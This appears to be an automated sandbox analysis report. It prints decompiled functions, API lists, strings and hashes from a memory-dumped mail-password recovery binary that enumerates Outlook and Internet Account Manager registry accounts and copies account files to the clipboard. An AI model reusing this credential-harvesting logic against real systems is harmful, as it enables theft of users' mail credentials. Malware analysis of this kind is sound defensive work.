                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00404332
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00404345
                                                                                                                                                                  • strchr.MSVCRT ref: 00404353
                                                                                                                                                                  • strlen.MSVCRT ref: 00404367
                                                                                                                                                                  • sprintf.MSVCRT ref: 00404388
                                                                                                                                                                  • strchr.MSVCRT ref: 00404399
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                  • API String ID: 1359934567-4070641962
                                                                                                                                                                  • Opcode ID: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                  • Instruction ID: 1c9d9e350e6bfb7db098629835421676e34b4d03cf30903a353d84187424ac51
                                                                                                                                                                  • Opcode Fuzzy Hash: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                  • Instruction Fuzzy Hash: AE3166B2904219AFDB11DB91DD81FDBB7ACAB14314F1001A7B708E2180D678AF958A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E004083E4(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                                                                                                                                  				void _v4103;
                                                                                                                                                                  				char _v4104;
                                                                                                                                                                  				int _t21;
                                                                                                                                                                  				int _t28;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  
                                                                                                                                                                  				_t35 = __eflags;
                                                                                                                                                                  				E00412360(0x1004, __ecx);
                                                                                                                                                                  				strcpy(0x4181b8, _a8);
                                                                                                                                                                  				strcpy(0x4182c0, "general");
                                                                                                                                                                  				E00407FBF(_t35, "TranslatorName", 0x41344f);
                                                                                                                                                                  				E00407FBF(_t35, "TranslatorURL", 0x41344f);
                                                                                                                                                                  				EnumResourceNamesA(_a4, 4, E0040820D, 0);
                                                                                                                                                                  				EnumResourceNamesA(_a4, 5, E0040820D, 0);
                                                                                                                                                                  				strcpy(0x4182c0, "strings");
                                                                                                                                                                  				_t28 = 0;
                                                                                                                                                                  				_v4104 = 0;
                                                                                                                                                                  				memset( &_v4103, 0, 0x1000);
                                                                                                                                                                  				do {
                                                                                                                                                                  					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
                                                                                                                                                                  					if(_t21 > 0) {
                                                                                                                                                                  						_t21 = E0040802D(_t28,  &_v4104);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t28 = _t28 + 1;
                                                                                                                                                                  				} while (_t28 <= 0xffff);
                                                                                                                                                                  				 *0x4181b8 = 0;
                                                                                                                                                                  				return _t21;
                                                                                                                                                                  			}

                                                                                                                                                                   Instruction addresses: 0x004083e4, 0x004083ec, 0x004083fc, 0x0040840c, 0x0040841c, 0x00408427, 0x00408442, 0x0040844c, 0x00408454, 0x0040845f, 0x00408469, 0x00408470, 0x00408478, 0x00408484, 0x0040848c, 0x00408496, 0x0040849c, 0x0040849d, 0x0040849e, 0x004084a8, 0x004084b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
                                                                                                                                                                    • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
                                                                                                                                                                    • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
                                                                                                                                                                    • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
                                                                                                                                                                  • EnumResourceNamesA.KERNEL32 ref: 00408442
                                                                                                                                                                  • EnumResourceNamesA.KERNEL32 ref: 0040844C
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
                                                                                                                                                                  • memset.MSVCRT ref: 00408470
                                                                                                                                                                  • LoadStringA.USER32 ref: 00408484
                                                                                                                                                                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                  • API String ID: 1060401815-3647959541
                                                                                                                                                                  • Opcode ID: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                  • Instruction ID: 8ec8ecd25de3f69567fa6951aee80203735b19b36847dd402765e4c6546554b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                  • Instruction Fuzzy Hash: 201108319401543AD73167569D0AFDB3E6CDB85B94F1040BFBA48A61C1D9BC59C086BC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E0040B656(intOrPtr __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t51;
                                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                                  				signed int _t59;
                                                                                                                                                                  				intOrPtr _t93;
                                                                                                                                                                  				signed char _t97;
                                                                                                                                                                  				intOrPtr _t100;
                                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  
                                                                                                                                                                  				_t95 = __ecx;
                                                                                                                                                                  				_t100 = _a4;
                                                                                                                                                                  				_t104 = _t100 - 0x402;
                                                                                                                                                                  				_t103 = __ecx;
                                                                                                                                                                  				if(_t104 > 0) {
                                                                                                                                                                  					_t51 = _t100 - 0x415;
                                                                                                                                                                  					__eflags = _t51;
                                                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                                                  						E0040A632(__ecx);
                                                                                                                                                                  						L22:
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  						E0040A3E9(0, _t95, _t103, 0);
                                                                                                                                                                  						L23:
                                                                                                                                                                  						if(_t100 ==  *((intOrPtr*)(_t103 + 0x374))) {
                                                                                                                                                                  							_t92 = _a12;
                                                                                                                                                                  							_t97 =  *(_a12 + 0xc);
                                                                                                                                                                  							_t56 =  *((intOrPtr*)(_t103 + 0x370));
                                                                                                                                                                  							if((_t97 & 0x00000008) == 0) {
                                                                                                                                                                  								__eflags = _t97 & 0x00000040;
                                                                                                                                                                  								if((_t97 & 0x00000040) != 0) {
                                                                                                                                                                  									 *0x4181ac =  *0x4181ac & 0x00000000;
                                                                                                                                                                  									__eflags =  *0x4181ac;
                                                                                                                                                                  									SetFocus( *(_t56 + 0x184));
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								E00409EE8(_t56, _t92);
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						return E00401939(_t103, _t100, _a8, _a12);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t59 = _t51 - 1;
                                                                                                                                                                  					__eflags = _t59;
                                                                                                                                                                  					if(_t59 == 0) {
                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x5c))();
                                                                                                                                                                  						_t95 =  *((intOrPtr*)(__ecx + 0x370));
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x74))();
                                                                                                                                                                  						E0040A5A1(__ecx);
                                                                                                                                                                  						SetFocus( *( *((intOrPtr*)(__ecx + 0x370)) + 0x184));
                                                                                                                                                                  						goto L22;
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t59 == 6;
                                                                                                                                                                  					if(_t59 == 6) {
                                                                                                                                                                  						SetFocus( *(__ecx + 0x378));
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L23;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t104 == 0) {
                                                                                                                                                                  					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                                                                                                                                  					E0040A5A1(__ecx);
                                                                                                                                                                  					goto L22;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t100 == 0x1c) {
                                                                                                                                                                  					__eflags = _a8;
                                                                                                                                                                  					if(_a8 == 0) {
                                                                                                                                                                  						 *((intOrPtr*)(_t103 + 0x378)) = GetFocus();
                                                                                                                                                                  					} else {
                                                                                                                                                                  						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L23;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t100 == 0x20) {
                                                                                                                                                                  					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                                                                                                                                  					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                                                                                                  						goto L23;
                                                                                                                                                                  					}
                                                                                                                                                                  					SetCursor(LoadCursorA( *0x417b94, 0x67));
                                                                                                                                                                  					return 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t100 == 0x2b) {
                                                                                                                                                                  					_t93 = _a12;
                                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t93 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                                                                                                                                  					if( *((intOrPtr*)(_t93 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                                                                                                  						SetBkMode( *(_t93 + 0x18), 1);
                                                                                                                                                                  						SetTextColor( *(_t93 + 0x18), 0xff0000);
                                                                                                                                                                  						_v8 = SelectObject( *(_t93 + 0x18),  *(__ecx + 0x258));
                                                                                                                                                                  						asm("stosd");
                                                                                                                                                                  						asm("stosd");
                                                                                                                                                                  						asm("stosd");
                                                                                                                                                                  						asm("stosd");
                                                                                                                                                                  						_t102 = _a12;
                                                                                                                                                                  						_v28 = 0x14;
                                                                                                                                                                  						_v20 = 5;
                                                                                                                                                                  						DrawTextExA( *(_t102 + 0x18), __ecx + 0x158, 0xffffffff, _t102 + 0x1c, 4,  &_v28);
                                                                                                                                                                  						SelectObject( *(_t102 + 0x18), _v8);
                                                                                                                                                                  						_t100 = _a4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(_t100 == 0x7b) {
                                                                                                                                                                  						_t99 = _a8;
                                                                                                                                                                  						if(_a8 ==  *( *((intOrPtr*)(__ecx + 0x370)) + 0x184)) {
                                                                                                                                                                  							E0040B48C(__ecx, _t99);
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L23;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040B6CF
                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040B6F2
                                                                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
                                                                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040B733
                                                                                                                                                                    • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
                                                                                                                                                                    • Part of subcall function 0040B48C: GetSubMenu.USER32(?,00000000), ref: 0040B4A7
                                                                                                                                                                    • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
                                                                                                                                                                  • LoadCursorA.USER32 ref: 0040B754
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040B75B
                                                                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B77D
                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040B7B8
                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040B831
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1416211542-0
                                                                                                                                                                  • Opcode ID: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                  • Instruction ID: bf574778d17b78baaeffb7f566a8ea64d240ccb0deb227a445330b453fade6b9
                                                                                                                                                                  • Opcode Fuzzy Hash: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                  • Instruction Fuzzy Hash: 4A519271100605EFCB15EF69CC88AEA7BA5FF44301F10443AF615AB2A1CB38AD51DB9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E00403E97(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                                                  				char _v76;
                                                                                                                                                                  				void _v1099;
                                                                                                                                                                  				char _v1100;
                                                                                                                                                                  				void _v2123;
                                                                                                                                                                  				char _v2124;
                                                                                                                                                                  				void _v3147;
                                                                                                                                                                  				char _v3148;
                                                                                                                                                                  				char _v4172;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_t56 = __ecx;
                                                                                                                                                                  				E00412360(0x1048, __ecx);
                                                                                                                                                                  				_t63 = _t56;
                                                                                                                                                                  				_v8 = _t63;
                                                                                                                                                                  				E00405F07(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                                  				_v1100 = 0;
                                                                                                                                                                  				memset( &_v1099, 0, 0x3ff);
                                                                                                                                                                  				_v3148 = 0;
                                                                                                                                                                  				memset( &_v3147, 0, 0x3ff);
                                                                                                                                                                  				_v2124 = 0;
                                                                                                                                                                  				memset( &_v2123, 0, 0x3ff);
                                                                                                                                                                  				_t71 = _t70 + 0x2c;
                                                                                                                                                                  				if( *0x418308 != 0) {
                                                                                                                                                                  					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x418308);
                                                                                                                                                                  					_t71 = _t71 + 0xc;
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *0x418304 != 0) {
                                                                                                                                                                  					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                                  				}
                                                                                                                                                                  				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                                                                                                                                  				_t58 = 0x10;
                                                                                                                                                                  				_push(_t36);
                                                                                                                                                                  				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                                                                                                                                  				asm("movsb");
                                                                                                                                                                  				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                                                                                                                                  				E00405F07(_a4,  &_v4172);
                                                                                                                                                                  				_push(0x413450);
                                                                                                                                                                  				_t55 = 6;
                                                                                                                                                                  				_push(E00407A69(_t55));
                                                                                                                                                                  				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                                  				_t48 = E00405F07(_a4,  &_v2124);
                                                                                                                                                                  				_t78 = _a8 - 4;
                                                                                                                                                                  				if(_a8 == 4) {
                                                                                                                                                                  					return E00409959(_v8, _t78, _a4);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t48;
                                                                                                                                                                  			}
                                                                                                                                                                  0x00403e97
                                                                                                                                                                  0x00403e9f
                                                                                                                                                                  0x00403eaf
                                                                                                                                                                  0x00403eb1
                                                                                                                                                                  0x00403eb4
                                                                                                                                                                  0x00403ec9
                                                                                                                                                                  0x00403ecf
                                                                                                                                                                  0x00403edd
                                                                                                                                                                  0x00403ee3
                                                                                                                                                                  0x00403ef1
                                                                                                                                                                  0x00403ef7
                                                                                                                                                                  0x00403efc
                                                                                                                                                                  0x00403f05
                                                                                                                                                                  0x00403f18
                                                                                                                                                                  0x00403f1d
                                                                                                                                                                  0x00403f1d
                                                                                                                                                                  0x00403f26
                                                                                                                                                                  0x00403f34
                                                                                                                                                                  0x00403f3a
                                                                                                                                                                  0x00403f3f
                                                                                                                                                                  0x00403f44
                                                                                                                                                                  0x00403f45
                                                                                                                                                                  0x00403f4e
                                                                                                                                                                  0x00403f6a
                                                                                                                                                                  0x00403f6b
                                                                                                                                                                  0x00403f7a
                                                                                                                                                                  0x00403f82
                                                                                                                                                                  0x00403f89
                                                                                                                                                                  0x00403f8f
                                                                                                                                                                  0x00403f9c
                                                                                                                                                                  0x00403fab
                                                                                                                                                                  0x00403fb3
                                                                                                                                                                  0x00403fb7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403fbf
                                                                                                                                                                  0x00403fc8

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                  • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                  • memset.MSVCRT ref: 00403EF7
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F18
                                                                                                                                                                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F6B
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F9C
                                                                                                                                                                  Strings
                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F2E
                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                  • API String ID: 1043021993-1670831295
                                                                                                                                                                  • Opcode ID: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                  • Instruction ID: 99203b830fad9dc7343b4b85adec4cad5e30f503418e1d4ebc977d79dce285bf
                                                                                                                                                                  • Opcode Fuzzy Hash: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                  • Instruction Fuzzy Hash: F13166B2D00119AEDB54EB95DC41EDF7BACEB08304F1441ABB608E3141DA786FD48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00402C1E(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				void _v275;
                                                                                                                                                                  				char _v276;
                                                                                                                                                                  				void _v1299;
                                                                                                                                                                  				char _v1300;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				intOrPtr _t36;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				void* _t58;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t64;
                                                                                                                                                                  				char* _t66;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  
                                                                                                                                                                  				_t83 = __fp0;
                                                                                                                                                                  				_t64 = __ecx;
                                                                                                                                                                  				_t35 = E0040F1B0(0x80000001, "Identities",  &_v8);
                                                                                                                                                                  				_t74 = _t73 + 0xc;
                                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_v276 = 0;
                                                                                                                                                                  					memset( &_v275, 0, 0xff);
                                                                                                                                                                  					_t40 = E0040F276(_v8, 0,  &_v276);
                                                                                                                                                                  					_t75 = _t74 + 0x18;
                                                                                                                                                                  					if(_t40 == 0) {
                                                                                                                                                                  						_t66 = "%s\\%s";
                                                                                                                                                                  						do {
                                                                                                                                                                  							_t69 = _a4;
                                                                                                                                                                  							E0040F232(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                                                                                                                                  							_v1300 = 0;
                                                                                                                                                                  							memset( &_v1299, 0, 0x3ff);
                                                                                                                                                                  							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                                                                                                                                  							_t52 = E0040F1B0(_v8,  &_v1300,  &_v16);
                                                                                                                                                                  							_t76 = _t75 + 0x3c;
                                                                                                                                                                  							_t80 = _t52;
                                                                                                                                                                  							if(_t52 == 0) {
                                                                                                                                                                  								E00402B92(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                                                                                                                                  							}
                                                                                                                                                                  							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                                                                                                                                  							_t58 = E0040F1B0(_v8,  &_v1300,  &_v20);
                                                                                                                                                                  							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402B92(_t64,  &_v20, _t81, _t83, _a4, 5);   /* subcall that processes one account subkey (memset + RegCloseKey seen inside it) */
							}
							_v12 = _v12 + 1;                                 /* next subkey index for the enumeration */
							_t60 = E0040F276(_v8, _v12,  &_v276);            /* RegEnumKeyExA wrapper: next account subkey name into _v276 */
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);                                 /* keep walking while the wrapper reports success */
					}
					RegCloseKey(_v8);                                        /* close the "...\Accounts" key opened for the walk */
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;                               /* clear a byte flag in the caller-supplied context structure */
				return _t36;
			}

Instruction addresses for this function: 0x00402c1e .. 0x00402d71 (disassembly column not captured)

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00402C5E
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D60
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • memset.MSVCRT ref: 00402CB8
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402CD1
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D0F
                                                                                                                                                                    • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
                                                                                                                                                                    • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                  • API String ID: 1831126014-3814494228
                                                                                                                                                                  • Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                  • Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
                                                                                                                                                                  • Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                  • Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405FD0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;        /* result: 0 on success, otherwise the GetLastError() value */
				void* _v12;      /* file handle returned by the CreateFileA subcall */
				long _v16;       /* bytes read by ReadFile */
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;                     /* _v8 = 0 */
				EmptyClipboard();                           /* no OpenClipboard() here: relies on the caller already owning the clipboard */
				_t14 = E00405ED5(_a4);                      /* subcall: CreateFileA(path, GENERIC_READ (0x80000000), FILE_SHARE_READ, OPEN_EXISTING (3)); the API list shows *.oeaccount on its stack */
				_v12 = _t14;
				if(_t14 == 0xffffffff) {                    /* INVALID_HANDLE_VALUE */
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);            /* low 32 bits of the size only; high dword is discarded */
					_t5 = _t36 + 1; // 0x1                  /* one extra byte for the terminating NUL */
					_t29 = GlobalAlloc(0x2000, _t5);        /* 0x2000 = GMEM_SHARE */
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();               /* on the ReadFile failure path the locked block is neither unlocked nor freed */
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;   /* NUL-terminate the file contents */
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);      /* 1 = CF_TEXT: the whole file is staged on the clipboard; ownership of the block passes to the clipboard */
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

Instruction addresses for this function: 0x00405fd6 .. 0x00406072 (disassembly column not captured)

                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405FDA
                                                                                                                                                                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
